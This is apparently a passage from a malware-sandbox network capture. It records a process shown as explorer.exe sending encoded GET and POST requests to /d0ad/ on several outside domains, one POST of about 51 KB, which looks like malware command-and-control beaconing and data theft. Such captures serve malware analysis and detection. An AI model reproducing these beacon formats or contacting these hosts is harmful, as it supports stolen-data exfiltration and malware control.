Oct 26, 2022 13:14:19.891688108 CEST	139	IN	Data Raw: 6a e2 36 5b cd d6 0f 86 3e e5 0c dd 98 87 30 94 2b 54 b3 aa 83 bd 4c 12 29 9b 8c e8 fe 82 68 c0 e7 e9 aa bc 8f 91 bb 22 de 57 46 17 8c 34 e8 78 65 b2 be b8 94 06 8e dd 76 ae 20 77 c2 9e 8c 6b d0 27 62 dc 27 c3 23 db 02 94 58 b6 aa 45 e7 5e 6b c3 Data Ascii: j6[>0+TL)h"WF4xev wk'b'#XE^kKZlDBkLV0`B4Vsvp-{4?/\|I-',E@{2^6#@dz.,:B$`Px.,6E\|y/D>!t)Ag)C

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49840	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:15:28.189862967 CEST	328	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=EKBIswxubh+3rSi760MLmAr4JXvPRLtL3ozMDitkvV65RFIqiY835aWCQtue5THCT9fxMq7VmpQKPerXNr4JKGfkodcEQfh6sQ== HTTP/1.1 Host: www.salemsilverpalace.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:15:28.215370893 CEST	329	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:15:28 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49854	162.0.238.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:12.221575975 CEST	446	OUT	POST /d0ad/ HTTP/1.1 Host: www.yumfechy.online Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.yumfechy.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yumfechy.online/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 71 71 4a 4b 6e 6e 72 32 4f 37 72 63 48 58 62 41 31 31 55 68 55 56 6d 67 4d 4c 77 64 58 57 64 52 5a 49 35 54 4c 36 56 36 4f 47 56 37 50 4c 6b 70 49 56 53 54 72 39 6e 50 49 35 61 47 52 59 32 32 78 75 51 6c 4b 64 46 32 6f 35 54 73 55 51 33 38 6c 41 52 30 79 66 59 6c 34 46 42 51 39 37 75 6c 71 52 37 30 51 45 72 68 76 54 6c 74 39 38 38 77 43 79 48 30 67 2d 59 54 50 38 6e 2d 32 38 78 47 75 32 44 41 78 52 45 6e 71 63 48 65 31 30 38 56 69 39 52 41 73 50 61 6e 7e 54 71 2d 63 38 62 62 38 79 5a 31 58 67 4a 62 6d 58 4e 6a 57 57 70 74 62 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=qqJKnnr2O7rcHXbA11UhUVmgMLwdXWdRZI5TL6V6OGV7PLkpIVSTr9nPI5aGRY22xuQlKdF2o5TsUQ38lAR0yfYl4FBQ97ulqR70QErhvTlt988wCyH0g-YTP8n-28xGu2DAxREnqcHe108Vi9RAsPan~Tq-c8bb8yZ1XgJbmXNjWWptbg).
Oct 26, 2022 13:16:12.480918884 CEST	447	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:16:12 GMT Server: Apache Content-Length: 1080 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 69 6e 74 65 72 65 73 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	192.168.11.20	49945	76.223.105.230	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:20:59.949137926 CEST	2110	OUT	POST /d0ad/ HTTP/1.1 Host: www.christophersubala.online Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.christophersubala.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.christophersubala.online/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4b 76 7e 53 6f 6e 46 58 49 34 58 43 35 63 39 77 45 64 28 71 53 68 6b 48 70 79 33 42 41 77 65 65 59 55 55 51 70 6b 74 71 42 33 71 69 31 34 53 7a 48 30 47 4f 62 36 37 54 37 67 44 59 49 67 28 6a 68 4c 69 68 51 39 28 52 59 34 43 32 48 38 32 33 66 4d 59 77 6d 44 57 68 44 45 56 52 62 58 36 4e 58 5a 70 31 65 34 58 50 42 46 64 79 58 5f 50 6e 4f 66 62 41 70 75 4a 71 34 49 59 4e 59 44 32 44 7a 67 77 65 52 49 6d 48 28 73 67 48 55 5f 72 77 6b 77 45 48 4a 43 41 41 42 49 44 44 35 43 69 59 42 61 79 4c 49 56 28 67 4c 4e 5a 75 58 65 67 2d 37 4e 68 32 68 35 74 48 32 72 78 77 5a 50 63 77 56 68 5a 5a 64 52 61 77 50 68 44 58 79 35 31 66 6f 37 79 66 59 4a 69 37 49 42 32 70 6b 65 59 64 5a 39 6d 70 68 69 4a 38 39 66 5a 59 30 56 4c 4c 68 35 50 73 55 70 62 59 49 74 51 30 52 4d 76 33 30 65 38 59 74 4a 58 59 79 69 6b 51 74 45 59 78 54 4e 6e 50 34 50 31 43 4a 55 50 77 4b 64 6c 37 30 68 36 33 38 48 28 6d 44 46 62 6c 79 78 62 5a 6c 66 67 58 35 4a 61 4e 79 52 4d 69 64 42 70 6d 58 55 64 51 5a 31 35 37 6d 4a 4f 76 78 32 53 61 6b 55 52 66 46 62 73 69 69 4c 68 6a 6c 46 72 39 79 74 68 4e 62 71 48 44 49 69 6b 4b 66 33 70 6d 39 65 56 30 6e 6f 4f 4b 33 65 67 38 64 75 56 4a 79 6b 48 6a 7a 4b 4c 6d 4a 64 4c 45 70 35 6e 6e 31 39 43 42 77 75 66 2d 74 6e 62 6f 69 35 47 73 53 5a 30 42 49 30 54 69 6f 49 54 5f 42 56 51 59 38 7a 32 62 54 70 66 6d 43 59 32 58 6d 69 43 63 63 5f 6d 31 6c 78 48 4d 50 73 59 61 5a 6c 76 34 38 47 33 73 6a 36 38 4e 37 54 59 4f 51 57 50 77 33 45 4b 72 6e 68 67 47 34 75 6a 4e 44 48 54 4a 66 53 59 61 33 78 41 34 62 6b 79 52 79 6a 67 30 37 73 56 39 50 49 6b 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=Kv~SonFXI4XC5c9wEd(qShkHpy3BAweeYUUQpktqB3qi14SzH0GOb67T7gDYIg(jhLihQ9(RY4C2H823fMYwmDWhDEVRbX6NXZp1e4XPBFdyX_PnOfbApuJq4IYNYD2DzgweRImH(sgHU_rwkwEHJCAABIDD5CiYBayLIV(gLNZuXeg-7Nh2h5tH2rxwZPcwVhZZdRawPhDXy51fo7yfYJi7IB2pkeYdZ9mphiJ89fZY0VLLh5PsUpbYItQ0RMv30e8YtJXYyikQtEYxTNnP4P1CJUPwKdl70h638H(mDFblyxbZlfgX5JaNyRMidBpmXUdQZ157mJOvx2SakURfFbsiiLhjlFr9ythNbqHDIikKf3pm9eV0noOK3eg8duVJykHjzKLmJdLEp5nn19CBwuf-tnboi5GsSZ0BI0TioIT_BVQY8z2bTpfmCY2XmiCcc_m1lxHMPsYaZlv48G3sj68N7TYOQWPw3EKrnhgG4ujNDHTJfSYa3xA4bkyRyjg07sV9PIk.
Oct 26, 2022 13:20:59.963478088 CEST	2111	IN	HTTP/1.1 404 Not Found content-type: text/html;charset=utf-8 content-length: 964 vary: Accept-Encoding server: DPS/2.0.0-beta+sha-c39653c x-version: c39653c x-siteid: eu-central-1 set-cookie: dps_site_id=eu-central-1; path=/ date: Wed, 26 Oct 2022 11:20:59 GMT keep-alive: timeout=5 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please
Oct 26, 2022 13:20:59.963535070 CEST	2111	IN	Data Raw: 63 6f 6e 74 61 63 74 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: contact the site owner.</p> </div> </div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	192.168.11.20	49946	76.223.105.230	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:01.980170965 CEST	2113	OUT	POST /d0ad/ HTTP/1.1 Host: www.christophersubala.online Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.christophersubala.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.christophersubala.online/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 4b 76 7e 53 6f 6e 46 58 49 34 58 43 35 63 39 77 45 64 28 71 53 68 6b 48 70 79 33 42 41 77 65 65 59 55 55 51 70 6b 74 71 42 33 79 69 31 4a 79 7a 47 58 7e 4f 61 36 37 54 79 41 44 5a 49 67 28 45 68 49 53 6c 51 39 7a 72 59 2d 47 32 47 72 79 33 66 61 45 77 77 54 57 73 47 45 56 54 4e 58 36 67 58 59 56 68 65 34 44 66 41 32 42 79 57 34 7a 6e 4b 76 6e 48 6e 65 4a 6f 34 49 59 4a 63 44 32 39 7a 67 45 4f 52 49 71 48 28 71 67 48 58 71 6e 77 6d 6a 63 48 52 43 41 44 50 6f 44 4d 33 69 69 58 42 5a 4f 48 49 56 7e 56 4c 49 68 75 58 59 67 2d 36 4b 31 78 68 5a 74 48 28 4c 78 76 49 66 42 33 56 68 46 52 64 52 47 77 50 68 72 58 7a 5a 31 66 74 5a 4b 63 62 70 69 78 5a 52 32 2d 76 2d 55 56 5a 39 79 39 68 67 46 38 36 76 64 59 33 43 58 4c 6d 63 76 73 57 4a 62 61 56 39 52 6f 66 73 76 37 30 65 74 7a 74 4a 33 69 79 67 6f 51 76 6d 67 78 58 73 6e 4d 73 66 31 2d 56 6b 4f 6b 48 39 5a 33 30 67 4b 56 38 48 28 32 44 47 58 6c 7a 42 72 5a 6b 65 68 42 7e 5a 61 4b 36 78 4e 6c 49 52 31 77 58 55 42 49 5a 77 34 6a 6d 4f 57 76 77 57 53 61 67 33 4a 65 4e 72 73 76 75 72 67 6d 6f 6c 72 71 79 74 39 37 62 75 28 35 4c 53 41 4b 65 44 4e 6d 35 4f 56 37 73 6f 4f 57 7e 2d 67 2d 5a 75 56 4a 79 6a 50 5a 7a 4b 48 6d 4b 6f 6e 45 70 4c 28 6e 7e 4f 36 42 39 4f 65 33 74 6e 62 69 69 35 4b 70 53 5a 38 6a 49 30 44 49 6f 4b 28 5f 43 41 4d 59 39 79 32 59 46 70 66 6e 49 34 32 41 69 69 4f 48 63 5f 71 4c 6c 78 33 32 4f 65 63 61 65 68 7a 34 76 57 33 72 7a 71 38 4b 79 7a 5a 58 42 47 43 30 33 45 57 37 6e 69 38 57 34 74 54 4e 42 53 36 68 4d 54 77 62 31 47 6c 4e 45 78 33 47 74 53 74 39 67 4f 68 43 62 64 78 5a 7a 4e 5a 61 4a 35 6d 56 58 45 44 71 4f 6e 79 6c 54 6a 79 75 45 79 69 4a 4e 6d 65 42 50 4c 61 4a 4d 41 53 64 53 69 61 68 49 36 57 5a 31 6b 41 36 77 6e 4a 4a 67 32 61 52 67 48 4b 50 74 35 28 62 31 54 30 43 7e 7a 57 75 45 32 74 73 78 42 50 50 50 46 30 64 7a 7a 41 7a 42 4f 30 43 56 79 55 54 72 77 6c 32 4f 61 49 4c 51 72 49 35 78 32 6b 64 79 68 66 65 4b 53 57 7a 67 38 4a 4c 4d 66 74 4b 74 4c 55 49 32 73 59 57 51 30 37 35 4f 5a 6e 7a 78 73 39 4b 7e 54 69 68 50 39 46 75 73 34 4c 6d 61 61 58 56 6f 6c 6b 79 36 74 52 36 36 46 66 7a 78 76 50 66 4c 5a 53 6a 68 46 4f 43 7e 4c 69 34 67 72 37 45 43 6e 6c 46 78 59 66 63 4e 66 56 6c 37 62 54 79 64 64 73 71 58 69 57 4f 55 47 48 39 6d 6b 71 79 72 36 33 49 45 55 79 53 57 4a 67 6f 59 45 48 71 65 33 4f 66 7a 4f 37 5f 51 38 6f 57 6d 74 46 6a 46 6e 6b 4b 4b 39 36 48 36 6f 73 73 7e 6a 4d 68 38 4c 39 50 4d 44 38 4d 32 74 53 73 77 4c 57 66 79 4b 73 4b 6c 5a 59 79 44 48 78 4e 56 33 73 72 55 6f 59 43 43 69 55 6d 51 59 45 64 32 41 57 4b 6e 42 5a 6d 48 58 36 73 Data Ascii: jXu=Kv~SonFXI4XC5c9wEd(qShkHpy3BAweeYUUQpktqB3yi1JyzGX~Oa67TyADZIg(EhISlQ9zrY-G2Gry3faEwwTWsGEVTNX6gXYVhe4DfA2ByW4znKvnHneJo4IYJcD29zgEORIqH(qgHXqnwmjcHRCADPoDM3iiXBZOHIV~VLIhuXYg-6K1xhZtH(LxvIfB3VhFRdRGwPhrXzZ1ftZKcbpixZR2-v-UVZ9y9hgF86vdY3CXLmcvsWJbaV9Rofsv70etztJ3iygoQvmgxXsnMsf1-VkOkH9Z30gKV8H(2DGXlzBrZkehB~ZaK6xNlIR1wXUBIZw4jmOWvwWSag3JeNrsvurgmolrqyt97bu(5LSAKeDNm5OV7soOW~-g-ZuVJyjPZzKHmKonEpL(n~O6B9Oe3tnbii5KpSZ8jI0DIoK(_CAMY9y2YFpfnI42AiiOHc_qLlx32Oecaehz4vW3rzq8KyzZXBGC03EW7ni8W4tTNBS6hMTwb1GlNEx3GtSt9gOhCbdxZzNZaJ5mVXEDqOnylTjyuEyiJNmeBPLaJMASdSiahI6WZ1kA6wnJJg2aRgHKPt5(b1T0C~zWuE2tsxBPPPF0dzzAzBO0CVyUTrwl2OaILQrI5x2kdyhfeKSWzg8JLMftKtLUI2sYWQ075OZnzxs9K~TihP9Fus4LmaaXVolky6tR66FfzxvPfLZSjhFOC~Li4gr7ECnlFxYfcNfVl7bTyddsqXiWOUGH9mkqyr63IEUySWJgoYEHqe3OfzO7_Q8oWmtFjFnkKK96H6oss~jMh8L9PMD8M2tSswLWfyKsKlZYyDHxNV3srUoYCCiUmQYEd2AWKnBZmHX6s
Oct 26, 2022 13:21:01.980242968 CEST	2119	OUT	Data Raw: 62 6f 55 58 35 78 31 54 6e 45 6b 6f 75 61 62 78 49 2d 76 4b 34 46 51 5f 63 48 78 4a 6c 32 58 66 59 75 61 6a 4c 35 50 46 49 6c 78 65 58 57 70 54 6c 31 71 74 44 57 6b 48 5a 34 63 31 52 41 48 5f 35 35 65 5f 65 74 48 42 58 66 45 49 52 47 76 76 39 5f Data Ascii: boUX5x1TnEkouabxI-vK4FQ_cHxJl2XfYuajL5PFIlxeXWpTl1qtDWkHZ4c1RAH_55e_etHBXfEIRGvv9_QtJ1sCMxtjl9kPZEJp0f5ASP59ruz3eDC4CUwkbmRIkwx3u9IEameeXxLlv-MYP3v7KpvMo3d_Btsy4aqSXcG1WwpkpoRd2ZPzFPes~o0yZhoBTfjgHzjGx_7BDzWf6UuzNl5zhUK-E4mn(XT8bxEGxfZBH0KqGBd
Oct 26, 2022 13:21:01.980297089 CEST	2124	OUT	Data Raw: 56 5a 31 4d 54 6c 68 4d 53 4c 7e 36 7e 71 63 43 42 38 74 74 49 79 6d 69 64 67 66 36 6e 6a 64 52 44 4c 6c 71 38 70 46 65 6e 69 48 6a 76 7a 56 2d 5a 6e 30 7a 73 4c 4b 75 35 39 4a 41 47 58 32 6e 44 4c 41 74 79 77 66 52 67 46 4a 71 35 6a 70 67 44 72 Data Ascii: VZ1MTlhMSL~6~qcCB8ttIymidgf6njdRDLlq8pFeniHjvzV-Zn0zsLKu59JAGX2nDLAtywfRgFJq5jpgDrLPzZQ3Uv8FVlrbh35ZJyXXmBPbo7SrLQZZ57HxmE7v79tdWY3pnYvq2cE_lJFsralEH1ZfWO(N86yFgeXo(MloSdyz9t4etP854wlxNEvDPMSXmH4WYmb8LqjFulboXPSgaHAvS2dgm3J2NUpsk7eZjbwzFnQEkeV
Oct 26, 2022 13:21:01.991499901 CEST	2127	OUT	Data Raw: 77 6b 4d 75 59 42 75 43 75 2d 69 4c 4a 64 4f 59 42 41 50 53 69 46 42 7a 6a 5a 32 6e 69 45 59 6a 72 36 6e 4e 65 39 77 30 5a 79 77 78 56 68 76 4b 72 55 52 35 46 7a 43 76 56 65 59 56 44 6b 56 70 56 75 58 4f 37 48 4f 76 68 70 4d 71 66 39 61 36 76 43 Data Ascii: wkMuYBuCu-iLJdOYBAPSiFBzjZ2niEYjr6nNe9w0ZywxVhvKrUR5FzCvVeYVDkVpVuXO7HOvhpMqf9a6vC(j9B~s1pgq4d5beip9YvjjNlLbsFbiF7dSd8S_HqLWyOB6d6pAwntYaDitOhXEDFxo9_1lLCqpq-epzHsa1xIkQ8oi98VXLo(vo6ipITpZvGNPLK6Nce1fhauZyg4Ts0t3MAKwXCfrfHLMHvTBwXhfHX~QSkoZGzv
Oct 26, 2022 13:21:01.991570950 CEST	2129	OUT	Data Raw: 43 54 30 69 63 51 4a 55 69 71 56 59 6e 62 72 6a 7a 31 4f 46 4d 38 45 6d 48 53 50 4e 72 51 59 47 6a 4f 39 34 77 34 65 76 63 63 51 69 44 51 53 34 48 43 42 52 7a 39 54 47 5a 6e 59 6f 53 4c 30 57 34 76 4a 4f 71 4f 28 65 4d 78 43 73 6d 45 37 65 31 6f Data Ascii: CT0icQJUiqVYnbrjz1OFM8EmHSPNrQYGjO94w4evccQiDQS4HCBRz9TGZnYoSL0W4vJOqO(eMxCsmE7e1oa4byngWfQ6AMRCcgpVzHg7HPjLGf9O0D7NJh~azCje~703BO5kUzuhHftoSxVnFbHc5I8NkqKmCQN3YOTLPvaiic9PFX9-Y8ln8ICk2DFa8gV8zm4xH1AVjS8cckrT0nWuIEyReO0JoqvbNW5Fw4itn_HZ164sGQM
